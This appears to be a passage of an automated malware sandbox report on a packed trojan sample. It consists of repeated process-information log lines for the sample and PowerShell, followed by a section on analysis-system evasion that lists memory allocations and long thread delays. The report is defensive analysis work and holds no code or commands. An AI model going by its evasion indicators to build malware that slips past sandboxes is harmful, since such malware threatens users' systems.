                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 4470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 9530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: A530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: A780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: B780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 1680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599842Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599706Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599452Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596909Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596782Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596657Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596532Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596407Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596282Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeThread delayed: delay time: 596157Jump to behavior
